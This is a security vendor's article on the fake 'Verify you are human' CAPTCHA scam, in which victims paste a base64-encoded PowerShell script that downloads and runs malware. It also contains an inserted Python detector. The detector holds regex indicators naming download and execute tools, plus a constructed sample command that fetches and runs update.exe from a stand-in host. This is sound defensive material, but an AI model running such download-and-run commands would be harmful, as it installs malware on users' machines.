While browsing the Web, you may occasionally land on a page that says “Verify you are human” and asks you to perform certain actions in PowerShell or Command Prompt. These pages are, in fact, scams that aim to deploy malicious software or unwanted programs on your system. Let me explain how they work and how to avoid them in the future.
What is the Verify you are human scam?
“Verify you are human” is a chain of malicious websites that trick visitors into downloading and running malicious programs. As you may have guessed from the name, they mimic CAPTCHA pages, but in fact have nothing in common with genuine human verification sites. Their methods mainly target people who are not aware of how verification normally works.
Most often, users get to such pages after clicking some element on a shady website, such as a page with pirated movies or unlicensed software. The fraudsters who maintain such websites stuff every interactive element with redirects that throw visitors to malicious pages of various kinds. As the redirect happens in the same tab, Verify you are human scam pages are really convincing to unsuspecting users.
We wrote earlier about how Lumma Stealer spreads through such fake verification sites. That article covers quite an extensive fraudulent scheme that attacks hundreds of people each day – consider checking it out.
How does this scam work?
On the Verify you are human page, the user sees just a button saying “I am not a robot”. Upon clicking it, the button changes to a request to open PowerShell (or, in some cases, Command Prompt), press the Ctrl+V combination and then Enter. Behind the scenes, clicking the first button copies a malicious script to the user's clipboard. Below, you can see our analysis of such a script:
Once they paste that script into PowerShell, the main part of the attack happens. The script contains base64-encoded instructions to connect to a remote server, download a file and run it. Obviously, there’s no hope that any of the files downloaded that way will be legitimate. Here is a short list of malware types that can infect computers in this way:
Malicious browser extensions. This is a type of malware that has become massively widespread over the last few months. Their key purpose is intercepting search queries and redirecting the user to a no-name search engine whose results are riddled with advertisements. Additionally, such plugins appear to collect personal information about the user that the browser keeps for autofill forms.
I’ve covered several malicious browser extensions that were enormously widespread a few weeks ago. If you are interested in learning more about such threats, here is the article about the PrimeLookup browser extension.
Infostealer or backdoor malware. These are among the most dangerous malware types, due to their stealthiness and potential for delayed damage. It is hard to notice the symptoms of their activity, but later, one can see online accounts being stolen. Backdoors can also selectively steal specific files and provide remote access to the computer.
Unwanted programs. The variety of this type is vast: from fake system optimizers to “advanced search bars” that hijack the web browser and act pretty much like the malicious browser extensions described above. They rarely hide their presence and, on the contrary, try to convince the user that they are tremendously useful.
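The pasted script described above hides its real instructions (connect to a remote server, download a file, run it) inside base64, so a check has to decode before it looks. The Python code below is an added example, not part of the original article or of any product it mentions; the function names, the indicator list and the sample strings are assumptions constructed for illustration.

```python
import base64
import re

# Long base64-looking runs; the lure hides its real instructions in one of these.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Behaviours the article describes: contact a remote server, download a file, run it.
INDICATORS = {
    "download": re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                           r"downloadstring|downloadfile|start-bitstransfer)\b"),
    "execute": re.compile(r"(?i)\b(invoke-expression|iex|start-process|mshta|rundll32)\b"),
    "remote_url": re.compile(r"(?i)\bhttps?://[^\s'\"]+"),
}

def decode_layers(text):
    """Return the text itself plus every base64 run that decodes to readable script."""
    layers = [text]
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        except ValueError:
            continue  # not valid base64 after all
        for codec in ("utf-16-le", "utf-8"):  # -EncodedCommand payloads are UTF-16LE
            try:
                decoded = raw.decode(codec)
            except UnicodeDecodeError:
                continue
            if decoded.isascii() and all(c.isprintable() or c.isspace() for c in decoded):
                layers.append(decoded)
                break
    return layers

def assess(text):
    """Sorted indicator names found in the command line or in its decoded payloads."""
    return sorted({name for layer in decode_layers(text)
                   for name, pattern in INDICATORS.items() if pattern.search(layer)})

def is_download_and_run(text):
    """True when the command both fetches remote content and executes something."""
    return {"download", "execute"} <= set(assess(text))

def encode_ps(script):
    """Build a constructed sample the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed samples, not from a real campaign; example.invalid never resolves.
SAMPLE_LURE = "powershell -enc " + encode_ps(
    "iwr http://example.invalid/update.exe -OutFile $env:TEMP\\u.exe; Start-Process $env:TEMP\\u.exe")
SAMPLE_BENIGN = "Get-ChildItem C:\\Users -Recurse | Measure-Object"
```

Running `assess` over clipboard text or logged PowerShell command lines shows which behaviours are present; `is_download_and_run` flags only the combination the scam relies on, so an ordinary download command alone does not trigger it.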
How to delete malware?
If you have interacted with a Verify you are human scam page, chances are there is malware running on the system. To get rid of it and any of its traces, consider running a Full scan with GridinSoft Anti-Malware. This program will quickly delete any malicious program, regardless of its source and form. And there is a free trial option, too – no card info needed. Click the banner below and get your system cleaned up.
To avoid getting to such websites in the future, you can block redirections completely, so no website will be able to pull you into another dirty scam. Disabling redirects is a rather simple process. Here is a step-by-step guide for Google Chrome and Chromium-based browsers:
- Step 1. Open Chrome, then go to the Settings tab. Here, choose the Privacy and Security tab in the left menu.
- Step 2. All the way down, you will see the Site Settings menu. Click it, and scroll down to the Pop-ups and redirects section.
- Step 3. Here, set the Default behavior to “Don’t allow sites to send pop-ups or use redirects”. This setting will block the redirections, and, as a bonus, disable push notifications.